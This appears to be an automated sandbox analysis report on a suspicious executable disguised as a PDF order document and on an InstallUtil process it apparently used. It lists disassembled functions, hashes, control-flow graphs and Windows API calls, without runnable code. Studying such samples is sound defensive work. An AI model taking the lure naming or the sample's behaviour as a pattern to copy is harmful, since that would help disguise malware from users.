                                                                        • API String ID: 0-2697143702
                                                                        • Opcode ID: 806b0166e5fc203c8b757dc8f230c23d07777203ab7ff5cd72d40169638c48fb
                                                                        • Instruction ID: bbdd300b17dd3703941bf8ef40994c19d8f0131c11202fb012723f679edc0c8d
                                                                        • Opcode Fuzzy Hash: 806b0166e5fc203c8b757dc8f230c23d07777203ab7ff5cd72d40169638c48fb
                                                                        • Instruction Fuzzy Hash: F0711A71E10208DFDB08EF6AE59069ABBF3FFC9300F18E529D5049B269EF7469458B40
                                                                        Function 00DFF9D0 Relevance: .4, Instructions: 431COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6505429454bf71edd26ba14217d13e32abbc557e9c4d19399b9632299efa405d
                                                                        • Instruction ID: 215faef7d812482fe256d4c70aab15b2341dd4fd6ae0bd587b3bbcacdb173fa8
                                                                        • Opcode Fuzzy Hash: 6505429454bf71edd26ba14217d13e32abbc557e9c4d19399b9632299efa405d
                                                                        • Instruction Fuzzy Hash: F3129471E006588BDB14CFAEC98069DFBF2BF88304F29C169D459EB21AD734A946CF54
                                                                        Function 072EE528 Relevance: .2, Instructions: 205COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1740111070.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72d0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: fbb46a850f1d4040325e94f5df45c555db724b4e99a0de25c4a34dcb9834164d
                                                                        • Instruction ID: 5651ddcc47ed69ff0ec40737970fb6cf7957b0da87a3d9139a3b6faba1d99307
                                                                        • Opcode Fuzzy Hash: fbb46a850f1d4040325e94f5df45c555db724b4e99a0de25c4a34dcb9834164d
                                                                        • Instruction Fuzzy Hash: 48815CB0D2431DCFEB64DFA9D844BADBBB9BF4A304F5180A9D009AB250EB745985CF01
                                                                        Function 072D0040 Relevance: .1, Instructions: 86COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1740111070.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72d0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 063281fafac5360db17b637bdca2e83980442867b45ad13da130ba2d71e55648
                                                                        • Instruction ID: 38b10c44ab6621187c73e63994b1f5c369a514ae454b2a9e4ea32e861ef06d46
                                                                        • Opcode Fuzzy Hash: 063281fafac5360db17b637bdca2e83980442867b45ad13da130ba2d71e55648
                                                                        • Instruction Fuzzy Hash: C741D8B1D24629CBEB68CF1ACC4469AB7F6BF89300F10D0EA980DA6254DB704EC58F01
                                                                        Function 072D001F Relevance: .1, Instructions: 80COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1740111070.00000000072D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_72d0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: b7bb27d241a1cf02c75fcddcb486a14613b11c85ef558562a7f951fc0dde4d06
                                                                        • Instruction ID: d48a295730765debc96291df396d5cde8268223cbfe84822a8f14494ce279b20
                                                                        • Opcode Fuzzy Hash: b7bb27d241a1cf02c75fcddcb486a14613b11c85ef558562a7f951fc0dde4d06
                                                                        • Instruction Fuzzy Hash: 743162B1D192558FEB29CF2ACC4469ABFB2EFCA300F04C0EAD4486B265D7310A85DF01
                                                                        Function 00DF4568 Relevance: 6.3, Strings: 5, Instructions: 6COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: T$TJcq$jjjjjj$$^q$$^q
                                                                        • API String ID: 0-3815819399
                                                                        • Opcode ID: ae1fd235ca2d100650ab781f3db622f1c570083c2e8107c1eb88f78bddd9b20f
                                                                        • Instruction ID: 2cac86f824bd7d1361b1d76cd987b80ae33a296fe516589000e5218b1d911293
                                                                        • Opcode Fuzzy Hash: ae1fd235ca2d100650ab781f3db622f1c570083c2e8107c1eb88f78bddd9b20f
                                                                        • Instruction Fuzzy Hash: 07B09230500208CE8B16DA008180468BBB0FB8170032080AEC1471E0268720C987EE12
                                                                        Function 00DF458E Relevance: 5.0, Strings: 4, Instructions: 6COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: TJcq$jjjjjj$$^q$$^q
                                                                        • API String ID: 0-672324049
                                                                        • Opcode ID: 11a8eb413d5fce00d1d7600ea39e29d5136ddd3598f79b572cce118124aa4725
                                                                        • Instruction ID: 702cb02592689967d01eecf010ac7db17e2b3e2643003413884ca6a918cb02a9
                                                                        • Opcode Fuzzy Hash: 11a8eb413d5fce00d1d7600ea39e29d5136ddd3598f79b572cce118124aa4725
                                                                        • Instruction Fuzzy Hash: 1CB0926140E788CFC7035A9048D12607E506BA2341B29C0EA85890E18BC050C885E731
                                                                        Function 00DF4545 Relevance: 5.0, Strings: 4, Instructions: 6COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: TJcq$jjjjjj$$^q$$^q
                                                                        • API String ID: 0-672324049
                                                                        • Opcode ID: 5387cb13b564b56b01905dc4232222d7a30f4fa20651d3024492f76c7fe4c2a5
                                                                        • Instruction ID: 7fdc32b1de43ba1d3b0f6e1afe34bc9fa813881511a85e6d8e75664f383d6acc
                                                                        • Opcode Fuzzy Hash: 5387cb13b564b56b01905dc4232222d7a30f4fa20651d3024492f76c7fe4c2a5
                                                                        • Instruction Fuzzy Hash: C9B09270102200CF8B06EA108184421B7B0FB8170032080AEC1470E02A87208987EA16
                                                                        Function 00DF45B1 Relevance: 5.0, Strings: 4, Instructions: 5COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: TJcq$jjjjjj$$^q$$^q
                                                                        • API String ID: 0-672324049
                                                                        • Opcode ID: 3056eee5497e2f3a8fe9681bb67380aa5255d18633eb5ebd09d496e0339cb3e3
                                                                        • Instruction ID: b1a9230496f55c2439ed7e1c8f9b34f1328800774486278cf02a825537cd60e1
                                                                        • Opcode Fuzzy Hash: 3056eee5497e2f3a8fe9681bb67380aa5255d18633eb5ebd09d496e0339cb3e3
                                                                        • Instruction Fuzzy Hash: 3FB09260805349CBDB118E8182D0340BB60BB60248F18C3B9C8480D807C328C58697A0

                                                                        Execution Graph

                                                                        Execution Coverage:11%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:49
                                                                        Total number of Limit Nodes:8
                                                                        execution_graph 20094 2684668 20095 2684676 20094->20095 20098 2686de1 20095->20098 20096 26846e9 20099 2686e05 20098->20099 20103 2686ee0 20099->20103 20107 2686ef0 20099->20107 20100 2686e0f 20100->20096 20104 2686f17 20103->20104 20106 2686ff4 20104->20106 20111 26863d4 20104->20111 20108 2686f17 20107->20108 20109 2686ff4 20108->20109 20110 26863d4 CreateActCtxA 20108->20110 20110->20109 20112 2687370 CreateActCtxA 20111->20112 20114 2687433 20112->20114 20115 2686788 DuplicateHandle 20116 268681e 20115->20116 20117 2686540 20118 2686586 GetCurrentProcess 20117->20118 20120 26865d8 GetCurrentThread 20118->20120 20121 26865d1 20118->20121 20122 2686615 GetCurrentProcess 20120->20122 20124 268660e 20120->20124 20121->20120 20123 268664b 20122->20123 20125 2686673 GetCurrentThreadId 20123->20125 20124->20122 20126 26866a4 20125->20126 20127 268e120 20128 268e12d 20127->20128 20130 268e166 20128->20130 20131 268c784 20128->20131 20133 268c78f 20131->20133 20132 268e1d8 20133->20132 20135 268c7b8 20133->20135 20136 268c7c3 20135->20136 20139 268e2c0 20136->20139 20137 268e256 20137->20132 20140 268e2ee 20139->20140 20142 268e317 20140->20142 20144 268e3bf 20140->20144 20145 268c850 GetFocus 20140->20145 20143 268e3ba KiUserCallbackDispatcher 20142->20143 20142->20144 20143->20144 20145->20142 20146 268bf10 20147 268bf1f 20146->20147 20149 268bff7 20146->20149 20150 268c03c 20149->20150 20151 268c019 20149->20151 20150->20147 20151->20150 20152 268c240 GetModuleHandleW 20151->20152 20153 268c26d 20152->20153 20153->20147

                                                                        Executed Functions

                                                                        Function 02686530 Relevance: 6.2, APIs: 4, Instructions: 191threadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 536 2686530-2686539 537 268653b-268653d 536->537 538 2686514-2686517 536->538 539 2686519-2686523 537->539 540 268653f-26865cf GetCurrentProcess 537->540 538->539 541 26864d1-2688390 538->541 539->536 552 26865d8-268660c GetCurrentThread 540->552 553 26865d1-26865d7 540->553 544 2688398-26883c3 541->544 545 2688392-2688395 541->545 550 26883cc-26883e0 544->550 551 26883c5-26883cb 544->551 545->544 551->550 555 268660e-2686614 552->555 556 2686615-2686649 GetCurrentProcess 552->556 553->552 555->556 558 268664b-2686651 556->558 559 2686652-268666d call 2686713 556->559 558->559 562 2686673-26866a2 GetCurrentThreadId 559->562 563 26866ab-26866da 562->563 564 26866a4-26866aa 562->564 568 26866e4-26866f6 563->568 564->563 570 26866f8-268670d 568->570
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 026865BE
                                                                        • GetCurrentThread.KERNEL32 ref: 026865FB
                                                                        • GetCurrentProcess.KERNEL32 ref: 02686638
                                                                        • GetCurrentThreadId.KERNEL32 ref: 02686691
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2918707031.0000000002680000.00000040.00000800.00020000.00000000.sdmp, Offset: 02680000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_2680000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID:
                                                                        • API String ID: 2063062207-0
                                                                        • Opcode ID: ed38d2e8d1a13ed967c5ffb81d80d38bc28035a977b24e1473427e024da167b8
                                                                        • Instruction ID: 9a6998fa6ac065969d383bbe49c731b211504f92d3f915b0e1f0f543978be24b
                                                                        • Opcode Fuzzy Hash: ed38d2e8d1a13ed967c5ffb81d80d38bc28035a977b24e1473427e024da167b8
                                                                        • Instruction Fuzzy Hash: 1D8145B0D00249CFDB14DFAAC548B9EBBF5EF48314F208569D419A7350D734A985CF66
                                                                        Function 02686540 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 573 2686540-26865cf GetCurrentProcess 577 26865d8-268660c GetCurrentThread 573->577 578 26865d1-26865d7 573->578 579 268660e-2686614 577->579 580 2686615-2686649 GetCurrentProcess 577->580 578->577 579->580 582 268664b-2686651 580->582 583 2686652-268666d call 2686713 580->583 582->583 586 2686673-26866a2 GetCurrentThreadId 583->586 587 26866ab-26866da 586->587 588 26866a4-26866aa 586->588 592 26866e4-26866f6 587->592 588->587 594 26866f8-268670d 592->594
                                                                        APIs
                                                                        • GetCurrentProcess.KERNEL32 ref: 026865BE
                                                                        • GetCurrentThread.KERNEL32 ref: 026865FB
                                                                        • GetCurrentProcess.KERNEL32 ref: 02686638
                                                                        • GetCurrentThreadId.KERNEL32 ref: 02686691
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2918707031.0000000002680000.00000040.00000800.00020000.00000000.sdmp, Offset: 02680000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_2680000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID: Current$ProcessThread
                                                                        • String ID:
                                                                        • API String ID: 2063062207-0
                                                                        • Opcode ID: 8dbc7566f285efa6d6fd7d3e3ee5ac6fb1af4c05389834f7876d73c659474107
                                                                        • Instruction ID: 3dc68ab0857340ef0e159d98c19023d4a3b0c2ef686667fe7dd0b6fedb4ac957
                                                                        • Opcode Fuzzy Hash: 8dbc7566f285efa6d6fd7d3e3ee5ac6fb1af4c05389834f7876d73c659474107
                                                                        • Instruction Fuzzy Hash: 505137B0D00249CFDB14DFA9D648B9EBBF5EF48304F208559E419A7360DB34A984CF66
                                                                        Function 078C7A80 Relevance: 4.3, Strings: 3, Instructions: 513COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 597 78c7a80-78c7a92 598 78c7a98-78c7a9c 597->598 599 78c7b85-78c7baa 597->599 600 78c7bb1-78c7c85 598->600 601 78c7aa2-78c7aa6 598->601 599->600 603 78c7c8c-78c7cb0 600->603 601->603 604 78c7aac-78c7ab1 601->604 620 78c7cb7-78c7d36 603->620 605 78c7adf-78c7ae2 604->605 606 78c7ab3-78c7adc 604->606 610 78c7b0e-78c7b7e 605->610 611 78c7ae4-78c7ae8 605->611 610->599 614 78c7afa-78c7b0b 611->614 615 78c7aea-78c7aee 611->615 615->614 619 78c7af0-78c7af4 615->619 619->614 619->620 645 78c7d68-78c7d6a 620->645 646 78c7d38-78c7d3c 620->646 647 78c7d6d-78c7d86 645->647 649 78c7d3e-78c7d52 646->649 650 78c7d54-78c7d5f 646->650 651 78c7dcf-78c7e02 647->651 652 78c7d88-78c7d98 647->652 649->645 649->650 650->645 658 78c7e48-78c7e6d 651->658 659 78c7e04-78c7e08 651->659 652->647 653 78c7d9a-78c7da4 652->653 653->651 657 78c7da6-78c7dce 653->657 662 78c7e74-78c7ec0 658->662 661 78c7e0a-78c7e10 659->661 659->662 666 78c7e18-78c7e21 661->666 676 78c7ec6-78c7ed0 662->676 677 78c8020-78c8045 662->677 670 78c7e27-78c7e33 666->670 674 78c7e3e-78c7e45 670->674 678 78c7eda-78c7ede 676->678 679 78c7ed2 676->679 680 78c804c-78c8070 677->680 678->680 681 78c7ee4-78c7eec 678->681 679->678 693 78c8077-78c8089 680->693 683 78c8011 681->683 684 78c7ef2 681->684 692 78c8017-78c801d 683->692 684->683 686 78c7ef9-78c7f18 684->686 687 78c7f1b-78c7f30 684->687 688 78c7f95-78c7f9b 684->688 690 78c7f61-78c7f92 687->690 691 78c7f32-78c7f36 687->691 688->693 694 78c7fa1-78c7faf 688->694 696 78c7f38-78c7f4e 691->696 697 78c7f50-78c7f59 691->697 692->677 693->692 710 78c808b 693->710 699 78c7fe0-78c800e 694->699 700 78c7fb1-78c7fb5 694->700 696->690 696->697 697->690 703 78c7fcf-78c7fd8 700->703 704 78c7fb7-78c7fcd 700->704 703->699 704->699 704->703
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (bq$(bq$(bq
                                                                        • API String ID: 0-2716923250
                                                                        • Opcode ID: c5ac13317998708bb9e008636045e0bbe516ffee790fd7cb5cf1f1b0f7421ccf
                                                                        • Instruction ID: a10bbc4bb6b444d86137f8e7f25726312927b72a79aaba6be504f439a4606794
                                                                        • Opcode Fuzzy Hash: c5ac13317998708bb9e008636045e0bbe516ffee790fd7cb5cf1f1b0f7421ccf
                                                                        • Instruction Fuzzy Hash: 6802AC71B006158FCB14DF68C99466EBBF2FF98300B14866EE54ADB784DA34ED06CB91
                                                                        Function 078C13D8 Relevance: 4.1, Strings: 3, Instructions: 365COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 711 78c13d8-78c13e8 712 78c13ee-78c13f2 711->712 713 78c1501-78c1526 711->713 714 78c152d-78c1552 712->714 715 78c13f8-78c1401 712->715 713->714 716 78c1559-78c158f 714->716 715->716 717 78c1407-78c142e 715->717 735 78c1596-78c15f5 716->735 730 78c1434-78c1436 717->730 731 78c14f6-78c1500 717->731 732 78c1438-78c143b 730->732 733 78c1457-78c1459 730->733 732->735 736 78c1441-78c144b 732->736 737 78c145c-78c1460 733->737 752 78c1619-78c1630 735->752 753 78c15f7-78c160b 735->753 736->735 738 78c1451-78c1455 736->738 739 78c14c1-78c14cd 737->739 740 78c1462-78c1471 737->740 738->733 738->737 739->735 742 78c14d3-78c14f0 739->742 740->735 744 78c1477-78c14be 740->744 742->730 742->731 744->739 761 78c1636-78c171b call 78c0910 752->761 762 78c1720-78c1730 752->762 810 78c160e call 78c1be0 753->810 811 78c160e call 78c1b00 753->811 812 78c160e call 78c1960 753->812 813 78c160e call 78c1970 753->813 814 78c160e call 78c1bd1 753->814 758 78c1614 760 78c1842-78c184d 758->760 767 78c187c-78c189d 760->767 768 78c184f-78c185f 760->768 761->762 769 78c181d-78c1839 762->769 770 78c1736-78c180f call 78c0910 762->770 777 78c186f-78c1875 768->777 778 78c1861-78c1867 768->778 769->760 807 78c181a 770->807 808 78c1811 770->808 777->767 778->777 807->769 808->807 810->758 811->758 812->758 813->758 814->758
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: (bq$(bq$Hbq
                                                                        • API String ID: 0-2835675688
                                                                        • Opcode ID: 2b2cda50228d96110afafd59d7f1a8fce55deee259ff21d6c806e9d377ddf379
                                                                        • Instruction ID: 26f0ab6c419835d59780bbe0fd1ca01a468f4b5329fb14917a09a2fdfa52488a
                                                                        • Opcode Fuzzy Hash: 2b2cda50228d96110afafd59d7f1a8fce55deee259ff21d6c806e9d377ddf379
                                                                        • Instruction Fuzzy Hash: 7EE17574A00209DFCB48EFA4D9949ADBBB2FF89300F108569E415AB365DF34ED46CB91
                                                                        Function 078C6860 Relevance: 2.8, Strings: 2, Instructions: 295COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 837 78c6860-78c68c0 843 78c68c8-78c6901 837->843 847 78c690a-78c694c 843->847 848 78c6903-78c6908 843->848 849 78c694f-78c6959 847->849 848->849 850 78c695f-78c6a4d 849->850 851 78c6a55-78c6b3a 849->851 850->851 890 78c6b3c-78c6b71 851->890 891 78c6b7e-78c6be9 851->891 890->891 902 78c6b73-78c6b76 890->902 905 78c6beb 891->905 906 78c6bf4 891->906 902->891 905->906 907 78c6bf5 906->907 907->907
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q$4'^q
                                                                        • API String ID: 0-2697143702
                                                                        • Opcode ID: e513d1247d063ecd74eb8ccd397c18e6c287ca725a8f00a154f8b72673abf54b
                                                                        • Instruction ID: 86ae1cfdff9aaffce535e0701739bd06e2fa62d0b65b4f0b56fec67ded7f7983
                                                                        • Opcode Fuzzy Hash: e513d1247d063ecd74eb8ccd397c18e6c287ca725a8f00a154f8b72673abf54b
                                                                        • Instruction Fuzzy Hash: B9C1B674B10218DFCB48EFA8C994A9DB7F2BF89300F104169E516AB3A5DB31EC42CB50
                                                                        Function 078C6850 Relevance: 2.8, Strings: 2, Instructions: 278COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 908 78c6850-78c6855 909 78c68a7-78c68ac 908->909 910 78c6857-78c68a4 908->910 914 78c68b5-78c68c0 909->914 910->909 915 78c68c8-78c6901 914->915 919 78c690a-78c694c 915->919 920 78c6903-78c6908 915->920 921 78c694f-78c6959 919->921 920->921 922 78c695f-78c6a4d 921->922 923 78c6a55-78c6b3a 921->923 922->923 962 78c6b3c-78c6b71 923->962 963 78c6b7e-78c6be9 923->963 962->963 974 78c6b73-78c6b76 962->974 977 78c6beb 963->977 978 78c6bf4 963->978 974->963 977->978 979 78c6bf5 978->979 979->979
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2954662272.00000000078C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078C0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_78c0000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 4'^q$4'^q
                                                                        • API String ID: 0-2697143702
                                                                        • Opcode ID: 1e638f2e075f84c960a00951357775232e0e34c6e53383ec564ea71a96a774c0
                                                                        • Instruction ID: 177fccc76efeef955db8758de0c8ce88b9aebc0d3b617234d0101641626af003
                                                                        • Opcode Fuzzy Hash: 1e638f2e075f84c960a00951357775232e0e34c6e53383ec564ea71a96a774c0
                                                                        • Instruction Fuzzy Hash: F5C1B674B10219DFCB48EFA4C994A9DB7F2BF89300F104169E516AB3A5DB35ED42CB90
                                                                        Function 0268BFF7 Relevance: 1.7, APIs: 1, Instructions: 200COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 980 268bff7-268c017 981 268c019-268c026 call 268b35c 980->981 982 268c043-268c047 980->982 987 268c028 981->987 988 268c03c 981->988 983 268c049-268c053 982->983 984 268c05b-268c09c 982->984 983->984 991 268c0a9-268c0b7 984->991 992 268c09e-268c0a6 984->992 1035 268c02e call 268c2a0 987->1035 1036 268c02e call 268c290 987->1036 988->982 994 268c0b9-268c0be 991->994 995 268c0db-268c0dd 991->995 992->991 993 268c034-268c036 993->988 996 268c178-268c238 993->996 998 268c0c9 994->998 999 268c0c0-268c0c7 call 268b368 994->999 997 268c0e0-268c0e7 995->997 1030 268c23a-268c23d 996->1030 1031 268c240-268c26b GetModuleHandleW 996->1031 1002 268c0e9-268c0f1 997->1002 1003 268c0f4-268c0fb 997->1003 1001 268c0cb-268c0d9 998->1001 999->1001 1001->997 1002->1003 1005 268c108-268c111 call 268b378 1003->1005 1006 268c0fd-268c105 1003->1006 1011 268c11e-268c123 1005->1011 1012 268c113-268c11b 1005->1012 1006->1005 1013 268c141-268c14e 1011->1013 1014 268c125-268c12c 1011->1014 1012->1011 1021 268c150-268c16e 1013->1021 1022 268c171-268c177 1013->1022 1014->1013 1016 268c12e-268c13e call 268b388 call 268b398 1014->1016 1016->1013 1021->1022 1030->1031 1032 268c26d-268c273 1031->1032 1033 268c274-268c288 1031->1033 1032->1033 1035->993 1036->993
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0268C25E
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2918707031.0000000002680000.00000040.00000800.00020000.00000000.sdmp, Offset: 02680000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_2680000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID: HandleModule
                                                                        • String ID:
                                                                        • API String ID: 4139908857-0
                                                                        • Opcode ID: dd26d8170caa1290d336e4ad2ba29ecca5dc67accfdb32931710bb3944c19256
                                                                        • Instruction ID: 531c35591207c7bd244db1ae603949e3a70ad7e8ed3d39428396e61851a25922
                                                                        • Opcode Fuzzy Hash: dd26d8170caa1290d336e4ad2ba29ecca5dc67accfdb32931710bb3944c19256
                                                                        • Instruction Fuzzy Hash: 6C813470A00B458FD728EF69D55075ABBF2BF88344F008A2ED48AD7B50DB75E946CB90
                                                                        Function 02687365 Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1037 2687365-268736d 1038 2687370-2687431 CreateActCtxA 1037->1038 1040 268743a-2687494 1038->1040 1041 2687433-2687439 1038->1041 1048 26874a3-26874a7 1040->1048 1049 2687496-2687499 1040->1049 1041->1040 1050 26874b8 1048->1050 1051 26874a9-26874b5 1048->1051 1049->1048 1053 26874b9 1050->1053 1051->1050 1053->1053
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 02687421
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2918707031.0000000002680000.00000040.00000800.00020000.00000000.sdmp, Offset: 02680000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_2680000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: 5f3dcb7d0dca05b50fd8aece90cdbe2114c696a38f35b01b51dd1ebe3f340bdb
                                                                        • Instruction ID: ea8f09a239ff6bdd743e746dc8b86d145dfb05a9b864f1ce950d884b0ca12cf2
                                                                        • Opcode Fuzzy Hash: 5f3dcb7d0dca05b50fd8aece90cdbe2114c696a38f35b01b51dd1ebe3f340bdb
                                                                        • Instruction Fuzzy Hash: 9641EFB0C00619CFDB24DFA9C944BCEFBB5BF49304F24816AD408AB255DB75698ACF90
                                                                        Function 026863D4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1054 26863d4-2687431 CreateActCtxA 1057 268743a-2687494 1054->1057 1058 2687433-2687439 1054->1058 1065 26874a3-26874a7 1057->1065 1066 2687496-2687499 1057->1066 1058->1057 1067 26874b8 1065->1067 1068 26874a9-26874b5 1065->1068 1066->1065 1070 26874b9 1067->1070 1068->1067 1070->1070
                                                                        APIs
                                                                        • CreateActCtxA.KERNEL32(?), ref: 02687421
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2918707031.0000000002680000.00000040.00000800.00020000.00000000.sdmp, Offset: 02680000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_2680000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID: Create
                                                                        • String ID:
                                                                        • API String ID: 2289755597-0
                                                                        • Opcode ID: 256be3335e7dd67ac44a4344bd84590faed6835d22247ba83a7ca975c8f56afd
                                                                        • Instruction ID: f544186203702c34cdbc2fe509c3058274916f370dcf10481bfe99d9bbe434e5
                                                                        • Opcode Fuzzy Hash: 256be3335e7dd67ac44a4344bd84590faed6835d22247ba83a7ca975c8f56afd
                                                                        • Instruction Fuzzy Hash: 2641E0B0C0061DCFDB24DFA9C944B9EFBB5BF48304F24816AD418AB255DB75698ACF90
                                                                        Function 02686783 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1071 2686783-268681c DuplicateHandle 1072 268681e-2686824 1071->1072 1073 2686825-2686842 1071->1073 1072->1073
                                                                        APIs
                                                                        • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0268680F
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.2918707031.0000000002680000.00000040.00000800.00020000.00000000.sdmp, Offset: 02680000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_2680000_InstallUtil.jbxd
                                                                        Similarity
                                                                        • API ID: DuplicateHandle
                                                                        • String ID:
